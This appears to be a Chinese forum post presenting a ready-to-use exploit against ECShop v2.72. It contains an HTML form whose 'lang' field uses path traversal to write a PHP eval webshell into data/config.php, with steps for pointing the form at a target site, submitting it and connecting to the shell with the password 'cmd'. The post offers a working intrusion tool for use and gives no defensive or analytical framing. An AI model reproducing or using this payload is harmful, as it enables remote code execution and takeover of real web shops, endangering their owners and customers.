ecshop v2.72 demo/index.php getshell方法

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ecshop v2.72 前台写shell漏洞 by: xhm1n9 ,Mr.LP 修改</title>
</head>

<body>

<form method="post" name="register" action="http://www.t00ls.net/demo/index.php">
<h3>ecshop v2.72 前台写shell漏洞 by: xhm1n9 ,Mr.LP 修改</h3>

<input type="text" name="lang" size="80" value="');@eval($_POST[cmd]);#_/../../templates/readme" />
<input type="hidden" name="step" value="readme" />
<button class="submit" type="submit" name="regsubmit" value="true">提交</button>

</form>
<p>

<h5>利用方试： </h5>
1,修改form 中action 的内容为需要网址<br />
2,提交表单一次<br />
3,连接一句话木马 [url]http://www.t00ls.net/data/config.php[/url] 密码为 cmd

</p>
</body>
</html>

复制代码保

标签分类：